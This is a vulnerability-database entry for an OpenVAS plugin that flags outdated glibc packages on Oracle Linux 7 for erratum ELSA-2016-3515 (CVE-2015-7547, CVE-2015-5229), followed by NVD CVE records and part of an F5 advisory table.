ID OPENVAS:1361412562310122879 Type openvas Reporter Eero Volotinen Modified 2019-03-14T00:00:00
Description
Oracle Linux Local Security Checks ELSA-2016-3515
###############################################################################
# OpenVAS Vulnerability Test
# $Id: ELSA-2016-3515.nasl 14180 2019-03-14 12:29:16Z cfischer $
#
# Oracle Linux Local Check
#
# Authors:
# Eero Volotinen <eero.volotinen@solinor.com>
#
# Copyright:
# Copyright (c) 2016 Eero Volotinen, http://solinor.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Registration phase: when the scanner loads the plugin with `description`
# set, only metadata is declared and the script exits before any host access.
if(description)
{
# Feed OID; the trailing component (122879) is the plugin id of this ELSA-2016-3515 check.
script_oid("1.3.6.1.4.1.25623.1.0.122879");
script_version("$Revision: 14180 $");
script_tag(name:"creation_date", value:"2016-02-18 07:27:21 +0200 (Thu, 18 Feb 2016)");
script_tag(name:"last_modification", value:"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $");
script_name("Oracle Linux Local Check: ELSA-2016-3515");
script_tag(name:"insight", value:"ELSA-2016-3515 - glibc security update. Please see the references for more insight.");
script_tag(name:"solution", value:"Update the affected packages to the latest available version.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"summary", value:"Oracle Linux Local Security Checks ELSA-2016-3515");
script_xref(name:"URL", value:"http://linux.oracle.com/errata/ELSA-2016-3515.html");
# CVE-2015-7547: stack-based buffer overflows in libresolv (send_dg/send_vc),
# reachable through getaddrinfo() via a crafted DNS response (remote DoS or
# possible code execution). CVE-2015-5229: calloc() does not properly
# initialise memory (DoS).
script_cve_id("CVE-2015-7547", "CVE-2015-5229");
# Score and vector are those of CVE-2015-7547 (CVSSv2 6.8), the higher of the
# two; CVE-2015-5229 alone rates 5.0.
script_tag(name:"cvss_base", value:"6.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
# Quality of detection "package": the verdict comes from the installed package
# versions gathered by the dependency below, not from exercising the flaw.
script_tag(name:"qod_type", value:"package");
script_dependencies("gather-package-list.nasl");
# Run only when the SSH package gathering reported an Oracle Linux 7 release;
# other releases are never evaluated by this plugin.
script_mandatory_keys("ssh/login/oracle_linux", "ssh/login/release", re:"ssh/login/release=OracleLinux7");
script_category(ACT_GATHER_INFO);
script_copyright("Eero Volotinen");
script_family("Oracle Linux Local Security Checks");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
# Detection phase: compare the installed glibc sub-packages against the
# fixed versions shipped by ELSA-2016-3515.
release = rpm_get_ssh_release();
if(!release) exit(0);

res = "";

# Version~release shared by every sub-package of this erratum. Note the
# "ksplice1" build: this check targets the Ksplice-enabled glibc line only;
# the plain el7_2.4 build is presumably handled by the sibling ELSA-2016-0176
# check listed in the references.
fixed_ver = "2.17~106.0.1.ksplice1.el7_2.4";

if(release == "OracleLinux7")
{
  # Same order as the erratum package list. The first sub-package found below
  # the fixed version is reported and the script stops; remaining packages
  # are not inspected once a finding exists.
  foreach pkg_name(make_list("glibc", "glibc-common", "glibc-devel", "glibc-headers", "glibc-static", "glibc-utils", "nscd"))
  {
    res = isrpmvuln(pkg:pkg_name, rpm:pkg_name + "~" + fixed_ver, rls:"OracleLinux7");
    if(res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }
}

# __pkg_match is set by the rpm helper when at least one of the packages was
# installed (at a fixed version): exit 99 marks "checked, not vulnerable";
# exit 0 otherwise means no relevant package was seen.
if (__pkg_match) exit(99);
exit(0);
{"id": "OPENVAS:1361412562310122879", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Linux Local Check: ELSA-2016-3515", "description": "Oracle Linux Local Security Checks ELSA-2016-3515", "published": "2016-02-18T00:00:00", "modified": "2019-03-14T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122879", "reporter": "Eero Volotinen", "references": ["http://linux.oracle.com/errata/ELSA-2016-3515.html"], "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "lastseen": "2019-05-29T18:35:24", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-5229", "CVE-2015-7547"]}, {"type": "f5", "idList": ["F5:K47098834", "F5:K23822215", "SOL47098834", "SOL23822215"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105561", "OPENVAS:1361412562310871555", "OPENVAS:1361412562310807299", "OPENVAS:1361412562310120650", "OPENVAS:1361412562310851208", "OPENVAS:1361412562310122877", "OPENVAS:1361412562310882399", "OPENVAS:1361412562310105554", "OPENVAS:1361412562310122878", "OPENVAS:1361412562310842643"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-3638", "ELSA-2016-0176", "ELSA-2016-3516", "ELSA-2016-0175", "ELSA-2016-3515", "ELSA-2016-2573"]}, {"type": "redhat", "idList": ["RHSA-2016:0175", "RHSA-2016:0277", "RHSA-2016:0225", "RHSA-2016:0176"]}, {"type": "nessus", "idList": ["VMWARE_VMSA-2016-0002_REMOTE.NASL", "REDHAT-RHSA-2016-0175.NASL", "CENTOS_RHSA-2016-0176.NASL", "ALA_ALAS-2016-660.NASL", "ORACLELINUX_ELSA-2016-0176.NASL", "ORACLELINUX_ELSA-2016-0175.NASL", "SL_20160216_GLIBC_ON_SL7_X.NASL", "SLACKWARE_SSA_2016-054-02.NASL", "CISCO-CSCUY36553-NXOS.NASL", "REDHAT-RHSA-2016-0176.NASL"]}, {"type": "centos", "idList": ["CESA-2016:0175", "CESA-2016:0176"]}, {"type": "seebug", "idList": ["SSV:90749"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783590", "MYHACK58:62201671834", "MYHACK58:62201783974"]}, {"type": "amazon", 
"idList": ["ALAS-2016-653", "ALAS-2016-660"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:0512-1", "OPENSUSE-SU-2016:0511-1", "OPENSUSE-SU-2016:0510-1"]}, {"type": "freebsd", "idList": ["2DD7E97E-D5E8-11E5-BCBD-BC5FF45D0F28"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20160304-01-GLIBC", "HUAWEI-SA-20160304-01-GLIBC-EN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138601"]}, {"type": "slackware", "idList": ["SSA-2016-054-02"]}, {"type": "vmware", "idList": ["VMSA-2016-0002"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DD5C62A73445C642253B1991DCB09412", "EXPLOITPACK:F166ACAD2E7FB4051F3FE1B40BED2A86"]}, {"type": "exploitdb", "idList": ["EDB-ID:40339", "EDB-ID:39454"]}, {"type": "threatpost", "idList": ["THREATPOST:85ADF3548849401007E4326098F0A726", "THREATPOST:C83FE8B4B85CD379E535AF0E229EB5D2"]}, {"type": "zdt", "idList": ["1337DAY-ID-24769", "1337DAY-ID-25827"]}, {"type": "cert", "idList": ["VU:457759"]}, {"type": "ubuntu", "idList": ["USN-2900-1"]}, {"type": "ics", "idList": ["ICSA-16-103-01"]}, {"type": "cisco", "idList": ["CISCO-SA-20160218-GLIBC"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0021"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3481-1:79F3C", "DEBIAN:DLA-416-1:26BFF"]}, {"type": "thn", "idList": ["THN:ACBFC80659E47A5B7C81B99570749679"]}, {"type": "archlinux", "idList": ["ASA-201602-14", "ASA-201602-15"]}], "modified": "2019-05-29T18:35:24", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2019-05-29T18:35:24", "rev": 2}, "vulnersScore": 7.5}, "pluginID": "1361412562310122879", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-3515.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under 
the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122879\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-18 07:27:21 +0200 (Thu, 18 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-3515\");\n script_tag(name:\"insight\", value:\"ELSA-2016-3515 - glibc security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-3515\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-3515.html\");\n script_cve_id(\"CVE-2015-7547\", \"CVE-2015-5229\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if 
((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "naslFamily": "Oracle Linux Local Security Checks", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:21:26", "description": "The calloc function in the glibc package in Red Hat Enterprise Linux (RHEL) 6.7 and 7.2 does not properly initialize memory areas, which might allow context-dependent attackers to cause a denial of service (hang or crash) via unspecified vectors.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-04-08T15:59:00", "title": "CVE-2015-5229", "type": "cve", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5229"], "modified": "2016-11-28T19:32:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6.7", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2"], "id": "CVE-2015-5229", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5229", "cvss": {"score": 5.0, "vector": 
"AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:29", "description": "Multiple stack-based buffer overflows in the (1) send_dg and (2) send_vc functions in the libresolv library in the GNU C Library (aka glibc or libc6) before 2.23 allow remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted DNS response that triggers a call to the getaddrinfo function with the AF_UNSPEC or AF_INET6 address family, related to performing \"dual A/AAAA DNS queries\" and the libnss_dns.so.2 NSS module.", "edition": 7, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-18T21:59:00", "title": "CVE-2015-7547", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, 
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2018-11-30T21:31:00", "cpe": ["cpe:/a:gnu:glibc:2.12.1", "cpe:/a:gnu:glibc:2.17", "cpe:/a:gnu:glibc:2.22", "cpe:/a:f5:big-ip_local_traffic_manager:12.0.0", "cpe:/a:gnu:glibc:2.12.2", "cpe:/o:suse:linux_enterprise_desktop:12", "cpe:/a:gnu:glibc:2.19", "cpe:/o:suse:suse_linux_enterprise_server:12", "cpe:/o:oracle:fujitsu_m10_firmware:2290", "cpe:/a:gnu:glibc:2.11.3", "cpe:/a:gnu:glibc:2.15", "cpe:/a:gnu:glibc:2.16", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:hp:server_migration_pack:7.5", "cpe:/a:gnu:glibc:2.9", "cpe:/a:gnu:glibc:2.12", "cpe:/a:oracle:exalogic_infrastructure:2.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/a:gnu:glibc:2.11", "cpe:/a:gnu:glibc:2.14", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:hp:helion_openstack:2.0.0", "cpe:/a:gnu:glibc:2.11.1", "cpe:/o:suse:linux_enterprise_server:11.0", "cpe:/a:f5:big-ip_access_policy_manager:12.0.0", "cpe:/a:f5:big-ip_application_security_manager:12.0.0", "cpe:/o:suse:linux_enterprise_software_development_kit:12", "cpe:/a:gnu:glibc:2.13", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:opensuse:opensuse:13.2", "cpe:/a:gnu:glibc:2.18", "cpe:/a:gnu:glibc:2.10", "cpe:/a:f5:big-ip_domain_name_system:12.0.0", "cpe:/a:oracle:exalogic_infrastructure:1.0", "cpe:/a:f5:big-ip_analytics:12.0.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.0.0", "cpe:/a:sophos:unified_threat_management_software:9.355", "cpe:/o:suse:linux_enterprise_software_development_kit:11.0", "cpe:/a:suse:linux_enterprise_debuginfo:11.0", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:gnu:glibc:2.21", "cpe:/a:hp:helion_openstack:2.1.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/a:f5:big-ip_application_acceleration_manager:12.0.0", "cpe:/o:suse:linux_enterprise_server:12", 
"cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:suse:linux_enterprise_desktop:11.0", "cpe:/a:gnu:glibc:2.20", "cpe:/a:gnu:glibc:2.10.1", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:sophos:unified_threat_management_software:9.319", "cpe:/a:hp:helion_openstack:1.1.1", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/a:gnu:glibc:2.11.2", "cpe:/a:f5:big-ip_advanced_firewall_manager:12.0.0", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/a:gnu:glibc:2.14.1", "cpe:/a:f5:big-ip_link_controller:12.0.0", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2015-7547", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7547", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:suse:linux_enterprise_server:12:sp1:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.18:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:hp:helion_openstack:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:12:*:*:*:*:*:*:*", "cpe:2.3:a:hp:helion_openstack:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.17:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:a:oracle:exalogic_infrastructure:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:sp1:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.14:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.9:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11.0:sp3:*:*:*:*:*:*", 
"cpe:2.3:a:gnu:glibc:2.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.20:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:12:*:*:*:*:*:*:*", "cpe:2.3:a:sophos:unified_threat_management_software:9.355:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sophos:unified_threat_management_software:9.319:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.19:*:*:*:*:*:*:*", "cpe:2.3:a:hp:server_migration_pack:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.21:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:fujitsu_m10_firmware:2290:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:exalogic_infrastructure:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11.0:sp2:*:*:lts:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.22:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.0.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:suse:linux_enterprise_debuginfo:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11.0:sp3:*:*:*:vmware:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:helion_openstack:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:12:sp1:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}], "f5": [{"lastseen": "2020-01-14T00:34:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-5229"], "description": "\nF5 Product Development has assigned ID INSTALLER-2354 to this vulnerability and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 12.0.0 \n11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 12.0.0 \n11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 12.0.0 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | 
Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.0.0 - 3.1.1 | Not vulnerable | None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | None | Low | glibc calloc()\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2018-06-13T19:19:00", "published": "2016-04-26T21:56:00", "id": "F5:K23822215", "href": "https://support.f5.com/csp/article/K23822215", "title": "glibc calloc vulnerability CVE-2015-5229", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-04-27T01:01:38", "bulletinFamily": "software", "cvelist": ["CVE-2015-5229"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading 